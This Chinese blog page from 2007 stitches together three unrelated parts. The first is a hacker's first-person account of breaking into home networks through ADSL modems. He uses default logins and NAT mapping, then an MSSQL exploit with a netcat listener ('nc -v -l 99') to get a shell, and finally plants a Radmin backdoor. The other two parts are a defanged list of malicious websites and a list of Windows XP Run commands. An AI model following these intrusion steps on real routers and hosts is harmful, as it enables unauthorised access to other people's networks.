2007年02月16日

这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范!

    口述:

    也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。

    一.扫描

    现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。

    二.映射

    入侵已经成功了一半,要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)。但是192.168.1.2到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下:进入NAT选项—添加NAT规则—BAMID—填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上了,我们访问ADSL MODEM就等于访问主机192.168.1.2了

    三.检测漏洞

    现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低B啊。 

    四.溢出

    既然没有弱口令,也没开80,那只好从溢出方面着手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行 。 

    五.募然回首,那人却在,灯火阑珊处

开来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?)心动不如行动,现在只好死马当活马医了,于是
  nc -v -l 99
  sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一个shell了。

    六.设置后门

    到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。

如今的恶意网站真是太多了,稍不小心就会中招,小编尽己所能在茫茫互联网中搜集了25个恶意网站,警示大家,但凡遇到以下网站,千万别点击哦!
警告:以下网站请勿进去!进去者自己处理。25个最恶意的中文网站,千万不要试!
(为防网友误点入,已把http:// 转换为 hxxp:///)

1、hxxp:///www.dj3344.com 打开后,重启时你的主页就变成它的,并通过 QQ 向他人传播,现在正飙行,奇坏无比!

2、hxxp:///www.qq168.net 打开后,重启时你的主页就变成它的,并通过 QQ 向他人传播,而且传波病毒,还狠些!现在正在飙行!

3、hxxp:///www.777888.com

4、hxxp:///WWW.5dsoft.com

5. hxxp:///www.wokoo.net

6. hxxp:///movie.sx.zj.cn

7. hxxp:///yeapple.com ***,打开后,你的程序中将加一些你意想不到的东西

8. hxxp:///xyxy68.8u8.net

9. hxxp:///www.youmiss.com

10. hxxp:///www.cctv8.net

11. hxxp:///www.kuliao.com

12. hxxp:///www.yyqy.com

13. hxxp:///winzheng.126.com

14. hxxp:///www.sunvod.com

15. hxxp:///www.t168.com

16. hxxp:///www.boliwo.com

17. hxxp:///www.coolcdrom.com 要特别小心这个网站,它会在你激活组里做手脚,使得重启以后标题依旧!

18. hxxp:///www.zhengdian.com OE 标题栏也没放过

19. hxxp:///girlchinese.com IE 的主页也被改了

20. hxxp:///www.yibinren.com 更可怕,把 IE 的默认页都改成他的了

21. hxxp://hxxp:///www.mtv51.com 什么雪落无声音乐网,恶性:禁止注册表修改,禁止开始菜单「运行」项。开机自动运行他的主页。

22. hxxp://www.163 [1].com 也是一个什么音乐网。症状和楼上的差不多。我上次中招后化了一个多小时才改回来!还有夹带病毒!

23. hxxp://hxxp:///www.37021.com 看清楚!不是 3721,可恶讨厌,在你的机器里到处做手脚:注册表激活计算器配置文件还有一个 dll 文件而且资源管理器无法浏览隐藏文件,这个最讨厌!

24. hxxp:///www.cnqb.net 禁止你的注册表,改首页,主页地址栏变灰,改右键,最毒!

更多列表:

hxxp://www.qq3344.com(net) 与文章中的 1、2 类似 ,这 3 个网站都有这种恶性,互相为变种。

youlove.3322.net/picture.exe 有恶意代码的特性外,还夹带病毒:Trojan.Pwdbox.d

hxxp:///www.58589.com 有恶意代码的特性外,还夹带病毒:Trojan.Tsqj.setup

tty.yyun.net 与上述的危害差不多

hxxp:///www.ftlink.net 一般性恶意代码

hxxp://><.com.tw/avnvyou520/ 一般性恶意代码

hxxp:///www.pixpox.com 恶性**网站。会加载不明插件,并且自动开启计算器后门,而且在计算器每个角落都有该网站留下的恶意程序,危害甚大!

hxxp:///www.k163.com(狩猎者变种和 DJ344、QQ3344、QQ168 是一伙的)

hxxp:///www.pk.com

hxxp:///www.xxx.com

hxxp:///204.177.92.68/rotate/r3.jhtml(去 TRY 看看,绝对让你的 IE 去回收站)

hxxp:///www.fassia.net/wmed/index1.html(上了这个以后就不要想上别的了)

hxxp:///www.ehomeday.com 搜索的时候它会给你一把哦!

hxxp:///www.jinpin.net 这个是老套的,跟以前的一样

WINDOWS XP 开始→运行→命令 集锦
winver———检查Windows版本
wmimgmt.msc—-打开windows管理体系结构(WMI)
wupdmgr——–windows更新程序
wscript——–windows脚本宿主设置
write———-写字板
winmsd———系统信息
wiaacmgr——-扫描仪和照相机向导
winchat——–XP自带局域网聊天
mem.exe——–显示内存使用情况
Msconfig.exe—系统配置实用程序
mplayer2——-简易widnows media player
mspaint——–画图板
mstsc———-远程桌面连接
mplayer2——-媒体播放机
magnify——–放大镜实用程序
mmc————打开控制台
mobsync——–同步命令
dxdiag———检查DirectX信息
drwtsn32—— 系统医生
devmgmt.msc— 设备管理器
dfrg.msc——-磁盘碎片整理程序
diskmgmt.msc—磁盘管理实用程序
dcomcnfg——-打开系统组件服务
ddeshare——-打开DDE共享设置
dvdplay——–DVD播放器
net stop messenger—–停止信使服务
net start messenger—-开始信使服务
notepad——–打开记事本
nslookup——-网络管理的工具向导
ntbackup——-系统备份和还原
narrator——-屏幕“讲述人”
ntmsmgr.msc—-移动存储管理器
ntmsoprq.msc—移动存储管理员操作请求
netstat -an—-(TC)命令检查接口
syncapp——–创建一个公文包
sysedit——–系统配置编辑器
sigverif——-文件签名验证程序
sndrec32——-录音机
shrpubw——–创建共享文件夹
secpol.msc—–本地安全策略
syskey———系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc—本地服务设置
Sndvol32——-音量控制程序
sfc.exe——–系统文件检查器
sfc /scannow—windows文件保护
tsshutdn——-60秒倒计时关机命令
tourstart——xp简介(安装完成后出现的漫游xp程序)
taskmgr——–任务管理器
eventvwr——-事件查看器
eudcedit——-造字程序
explorer——-打开资源管理器
packager——-对象包装程序
perfmon.msc—-计算机性能监测程序
progman——–程序管理器
regedit.exe—-注册表
rsop.msc——-组策略结果集
regedt32——-注册表编辑器
rononce -p —-15秒关机
regsvr32 /u *.dll—-停止dll文件运行
regsvr32 /u zipfldr.dll——取消ZIP支持
cmd.exe——–CMD命令提示符
chkdsk.exe—–Chkdsk磁盘检查
certmgr.msc—-证书管理实用程序
calc———–启动计算器
charmap——–启动字符映射表
cliconfg——-SQL SERVER 客户端网络实用程序
Clipbrd——–剪贴板查看器
conf———–启动netmeeting
compmgmt.msc—计算机管理
cleanmgr——-垃圾整理
ciadv.msc——索引服务程序
osk————打开屏幕键盘
odbcad32——-ODBC数据源管理器
oobe/msoobe /a—-检查XP是否激活
lusrmgr.msc—-本机用户和组
logoff———注销命令
iexpress——-木马捆绑工具,系统自带
Nslookup——-IP地址侦测器
fsmgmt.msc—–共享文件夹管理器
utilman——–辅助工具管理器
gpedit.msc—–组策略